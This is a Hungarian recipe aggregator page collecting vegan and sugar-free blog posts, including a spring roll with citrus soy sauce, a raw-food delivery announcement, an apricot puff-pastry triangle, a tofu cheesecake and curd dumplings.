Tavaszi tekercs citrusos szójaszósszal + a második hét cukor nélkül A kihívás második hete talán már könnyebb volt, noha az internet tele volt csokoládés receptekkel Valentin nap miatt. A második hétnek volt egy másik csábító pontja, mégpedig az, hogy kuktáskodtam a Makifood Valentin napi csokigyár óráján, ahol Wagner Bea vezetésével csokoládéba merültek a tanulók. Előre készültem és vittem magammal pirított mandulát arra az esetre, ha a csokoládéra fanyalodnék. Csodák csodájára egész könnyen vettem az akadályt, nem volt olyan pillanat, amikor erős késztetést éreztem volna, hogy lenyaljak egy spatulát. :) A pirított mandula igazán jó nasinak bizonyult. A második hét közepén Valentin nap estéjén aztán engedélyeztünk magunknak I.-vel négy, azaz négy szem datolyát! :) Egyszerűen már nem bírtuk tovább, kellett valami nagyon édes. Ezzel a négy szem datolyával megünnepeltük azt is, hogy túléltük a kihívás első felét! Hurrá! Gondolatban azonban nem tartom a cukormentességet. Csokoládéról, csokis tortáról, kekszekről álmodozok és már tervezem azt a desszertet, amivel megtörjük a cukor, édesség mentes böjtöt. Akkor jöjjön a recept. Húsevő barátok jöttek hozzánk, akiknek megmutattam, hogy igen, a vegetáriánus (a kihívás miatt éppen vegán) konyha is lehet színes és laktató. A tavaszi tekercs készítése jó mókának bizonyult, mindenki kivette benne a részét. Én ezt egy fajta salátának nevezem, mert a rizstésztát kivéve minden nyers benne. A répa és a paprika édes ízt adnak hozzá, az uborka és rizstészta natúr ízt, az újhagyma meg egy kis csípősséget. Ízlésünk szerint bármilyen más zöldséget (avokádót, káposztát, csírákat, stb.), de akár húst vagy halat is adhatunk hozzá (Hínyenc lazaccal készítette). Ami a dolog pikantériája az a citrusos szójaszósz. Ebbe mártogattuk a félbe vágott tekercseket és csak úgy záporoztak az ízek, a textúrák a szánkban. A tavaszi tekercs feltekerését Juci barátnőmtől tanultam, aki egy igazán autentikus helyen, Kambodzsában egy főzőiskolában ismerkedett a feltekerés művészetével. Kerestem nektek két videót, amelyek segítséget nyújtanak a tavaszi tekercsek elkészítéséhez. Remélem belevágtok! A tekercshez a rizslapot a Lehel piac arab üzletében vettem (itt mindig gyöngyszemekre bukkanok, tele van jobbnál jobb és különleges alapanyagokkal, amelyeket előtte sehol nem találtam!). Keleti/­­arab fűszereseknél, kínai szupermarketekben és szerintem hipermarketek külföldi élelmiszer részlegén is kapható. 20 lap 690 Ft-ba került. Tavaszi tekercs citrusos szójaszósszal Hozzávalók 5-6 főre: Tavaszi tekercshez: - 1 db hosszú kígyóuborka, nagyon vékonyan felszeletelve (kb. 6 cm hosszú, 3-4 mm széles) - 2 db piros kaliforniai paprika, nagyon vékonyan felszeletelve (kb. 6 cm hosszú, 3-4 mm széles) - 1 csomag újhagyma, fehér és zöld rész is nagyon vékonyan felszeletelve (kb. 6 cm hosszú, 3-4 mm széles) - 3-4 db közepes répa, nagyon vékonyan felszeletelve (kb. 6 cm hosszú, 3-4 mm széles) - 1 csomag rizslap - 200 g rizstészta/­­vermicelli üvegtészta (soba, udon tészta is használható), megfőzve, leszűrve - opcionális: néhány szál koriander, bazsalikom, felaprítva Citrusos szójaszószhoz: - 2 db citrom frissen facsart leve - 2 db mandarin frissen facsart leve - 1 teáskanál frissen reszelt gyömbér - 1,5-2 dl szójaszósz Az összes zöldséget aprítsuk fel és tegyük félre. Tegyünk egy tálba langyos vizet és áztassuk meg benne az első rizslapot úgy, hogy közben folyamatosan fogjuk a lapot és nem engedjük el. Kb. 10-20 másodpercig áztassuk vagy addig, amíg a lap hajlítható, puha lesz. Tegyük a beáztatott rizslapot magunk elé egy fa deszkára vagy egy lapos tányérra, majd a (hozzánk közelebb eső) lap aljától 2 cm-re feljebb, középre tegyünk mindegyik zöldségből, plusz tésztából és zöldfűszerből egy keveset (kb. 3-5 szálat minden zöldségből). A rizslap alját tekerjük szorosan a zöldségek fölé, majd a lap két oldalát is hajtsuk a zöldségekre és kezdjük el az egészet feltekerni. Az elkészült tekercsünket hagyhatjuk egészben, de félbe is vághatjuk és tegyük rá egy tálra. A szószhoz keverjük össze a hozzávalókat egy tálkában. Ebbe mártogassuk az elkészült tavaszi tekercseket. További cukormentes vegán receptekért katt ide.

Bővült a Vegafood nyersételes kínálata a Nyersétel Akadémia ételeivel!

2012. február 9. Gitta nyersétel blogja 

Bővült a Vegafood nyersételes kínálata a Nyersétel Akadémia ételeivel!A 7. héttől már rakott-töltött zöldségek kategóriában is tudsz rendelni a Vegafood vegetáriánus étel házhozszállító cégtől. Ezeket az élő fogásokat a Nyersétel Akadémián készítjük, a vegetáriánus futárcég pedig leszálltja neked. Az egészség házhoz megy, Budapest egész területén, és a környező településeken is meg lehet már kóstolni a legfinomabb nyers főételeket. Nincs időd vagy kedved elkészíteni? Nincs recepted? A nyers fasírtok mellett tudsz már második főételt is rendelni a jövő héttől itt: VEGAFOOD Február 13: Rakott savanyú káposzta Február 14: Cukkíni tekercsek édes-savanyú szósszal Február 15: Rakott brokkoli paprikával Február 16: Zöldség palacsinta céklás öntettel Február 17: Rakott répa céklával A február 14-i ebéd, cukkíni tekercsMinden ételünk szójamentes, tejmentes, cukormentes! Minden ételünk lisztmentes, vagyis nem tartalmaz glutént! Így lisztérzékenyek is fogyaszthatják! Hamarosan itt a tavasz, a méregtelenítés, böjt időszaka. Adj esélyt a szervezetednek, hogy az öngyógyító törekvések beinduljanak, kezdj el élő ételeket enni! Nem csak a mérlegen fogod látni a különbséget! Az élő édességek kínálata is kibővült, sok finom palacsintát, és más édességet tudsz rendelni. Ne feledd, liszt, tej és tojásmentesen, cukormentesen! A Nyersétel Akadémia elkészíti, a Vegafood házhoz viszi, neked csak meg kell rendelni.

Barackos Háromszög - Leveles

2012. február 5. Fittanyuka Blog 

Barackos Háromszög - Leveles Tej,-tojás,-cukor és élesztőmentes! Nincs finomabb a még meleg, illatozó, leveles tésztából készült sütiknél. Azt gondolnánk, hogy ezt nem lehet büntetlenűl enni. Van egy nagyon jó hírem! Elkészíthető csupa egészséges összetevőkből is, így nemcsak azok akik lúgosítanak ehetnek mértékkel  belőle, de azok is akik tej,-tojás érzékenyek vagy candida diét án vannak. Azért itt is szabály a mértékletesség! Az elkészítése kicsit időigényes, de az eredményért cserébe  megéri. Kétféle tésztát készítünk: Hozzávalók: Lágy tészta: 15 dkg teljes kiőrlésű tönkölyliszt 25 dkg fehér tönkölyliszt 10 dkg bio margarin 1 evőkanál citromlé 2.5 dl lanygyos víz 1 csipet tengeri só Kemény tészta: 10 dkg fehér tönkölyliszt 30 dkg bio margarin Töltelék: Nyírfacukorral készült barack lekvár A hozzávalókból összegyúrjuk a kemény és a lágy tésztát is.  Téglalap alakúra formázzuk és lisztezett tálra tesszük őket. A lágy tészta tetejét késsel bevagdossuk, majd alufóliával vagy folpackkal betakarjuk és hűtőbe tesszük kb. fél órára. Miután lehűltek a lágy tésztát lóhere alakúra nyújtjuk úgy, hogy középen vastagabb maradjon. A közepére rakjuk a kemény tésztát, amit beburkolunk a lágy tészta leveleivel, majd az egészet kinyújtjuk téglalap alakúra. Először háromrétegűre hajtjuk, elforgatjuk 90 fokkal, majd újra nyújtjuk. Ezután négyrét hajtjuk és visszatesszük fél órára a hűtőbe.  Ezt a nyújtás-hajtogatás-hűtés folyamatot még egyszer megismételjük, végül a tésztát kinyújtjuk, egyforma négyszögekre osszuk fel. A négyszögek közepére cukormentes baracklekvárt halmozunk ( 1 kávéskanálnyit). Háromszögbe hajtjuk, széleit alaposan lenyomkodjuk, hogy ne nyíljon szét és sütőpapírral kibélelt tepsibe sorakoztatjuk őket. Előmelegített sütőben 180 C fokon 15 perc alatt aranybarnára sütjük. Miután kicsit hűltek fahéjas por-nyírfacukorba hempergetjük. Fittanyuka - Lúgosító ételek a facebookon Fittanyuka

Sült túró Torta - Tej,-Tojás,-Cukormentes

2012. január 15. Fittanyuka Blog 

Sült túró Torta - Tej,-Tojás,-Cukormentes Ez az a sütemény amely melegen - hidegen egyaránt nagyon finom és mostmár egészségesebb is. A citrom héja és leve teszi igazán túró ízűvé a tortát. Ha sikerül beszereznetek selyem tofut, amely sokkal lágyabb, könnyebb, mint a hagyományos, a töltelék még könnyebb lesz. Az elkészítése egyszerű, csupa növényi összetevőkből, a sütése viszont picit időigényes, de megéri várni. Hozzávalók: (12 szelethez) A tésztához: 30 g xilit ( még jobb ha porrá daráljuk!) 100 g bio margarin 150 g világos tönkölyliszt 1/­­2 zacskó foszfátmentes sütőpor A túrótöltelékhez: 500 g selyem tofu, vagy hagyományos natúr tofu 100 g étkezési keményítő 1 csapott evőkanál agar-agar 100 g xilit 500 ml vaníliás rizs tej, vagy más növényi tej 400 ml kókusz tejszín 1 db citrom héja 1/­­2 citrom leve 1/­­2 kávéskanál  bourbon vanília Először a tésztát készítsük el. A lisztet keverjük el a xilittel, majd gyúrjuk hozzá a margarint. Ahogy összeáll a tészta, már jó is. Ne gyúrjuk túl, mert törni fog nyújtáskor. Ha elkészült, tegyük 10 percre hűtőbe. Ha megdermedt, nyújtsuk ki a tésztát, és béleljük ki a tortaforma alját - úgy, hogy a tészta felnyúljon 3-4 centit a forma falára -, hézagosan szurkáljuk meg, és süssük elő. Csak addig süssük, míg teljesen aranysárga nem lesz.  A krém összetevőit egy tálban alaposan mixeljük össze. Ha hagyományos tofut használtok akkor először sajt reszelőn reszeljétek le. Tegyük a híg tölteléket a formába, és kb 90 - 100 percig süssük 180 C-on - légkeverés nélkül. Ha sütés közben nagyon sötétedne a torta teteje, fedjük le sütőpapírral, vagy alufóliával! Hagyjuk kicsit hűlni a formában, majd kapcsoljuk le az oldalát és szeletelhetjük is. Fittanyuka - Lúgosító ételek a facebookon Fittanyuka

Citromos-mazsolás túrógombóc (másképp, és vegán is)

2010. augusztus 23. CsemetEledel 

Citromos-mazsolás túrógombóc (másképp, és vegán is) Mostanában elég sokat foglalkozom a cukormentességgel, ezért kísérleteim alanyai többnyire desszertek, bocsánat érte. :)) A túrógombóccal mindaddig hadilábon álltam, míg nem nem ismertem ezt a nagyszerű receptet. Nem szerettem sem enni, és soha nem is készítettem. Viszont mikor Csöppke-Csillus blogján vagy jó egy éve beleakadtam, nem tudtam neki ellenállni. Az okok: hogy nem kell a gombócokat főzni, a másik: hogy sokkal könnyebbnek tűnt maga a massza is, nem olyan, amibe meg lehet fulladni. A harmadik, pedig, hogy megihletetett egy cukormentes és egy vegán verzióban is. Épp elég ok hogy szeressük nem igaz? :) Hozzávalók: (Nem vegán, de cukormentes verzió) (kb 4o db mini gombóchoz) -fél liter növényi tej -1 biocitrom héja -fél kg túró -1 marék mazsola -1 pohár tejföl - kb 6 ek. gríz -kb 8 ek. xilit -1 ek. méz(nálam repce méz volt) -1 ek. olaj -zsemlemorzsa A tejből és a grízből és kb 4 ek xilitből nagyon sűrű tejbegrízt főzünk, majd féretesszük és hagyjuk kihűlni. Mialatt a tejbegríz hűl egy másik tálban a túrót 4 -5 ek xilitet, reszelt citrom héját és a marék megmosott lecsepegtetett mazsolát jó alaposan elkeverjük. Mikor már a grízünk hideg, és kőkemény lett, összekeverjük és jól összedolgozzuk a túrós masszával. Egy kicsi olajon zsemlemorzsát pirítunk, a masszából vizes kézzel gombócokat formázzuk, majd megforgatjuk a prézliben. Langyos mézestejföllel tálaljuk. (a tejfölt, és egy ek mézet nagyon lassan kavargatva felmelegítünk, langyosra) Jó étvágyat! Hozzávalók: (Vegán , cukormentes gombócok) -fél liter növényi tej -egy csomag natúr tofu (pl Alverde/­­ DM) -8 ek xilit -6 ek gríz -1 marék mazsola -1 pohár szójagurt, vagy szójatejföl(ami natúr tofu, ciromlé, és natur szójatej turmixa) -1 ek méz -1 ek olaj -1 ek zsemlemorzsa -bio citrom héja A sűrű tejbegrízt itt is megfőzzük először. A natúr tofut villával jól, túróállagúra nyomkodjuk,és ugyanúgy, mint az elősző verziónál beletesszük a xilitet a mazsolát citrom héját. A két masszát eggyé keverjük(mikor a tejbegríz már hideg), és ugyanúgy formázzuk, prézlibe forgatjuk és mézes szójagurttal tálaljuk :)


Szerintünk ez is ízleni fog ...

Hibát talált oldalainkon? Segítsen a javításában! Mondja el nekünk!



Hiányol valamit oldalainkról? Javasoljon új tartalmakat vagy funkciókat!



Észrevétele van? Küldje el!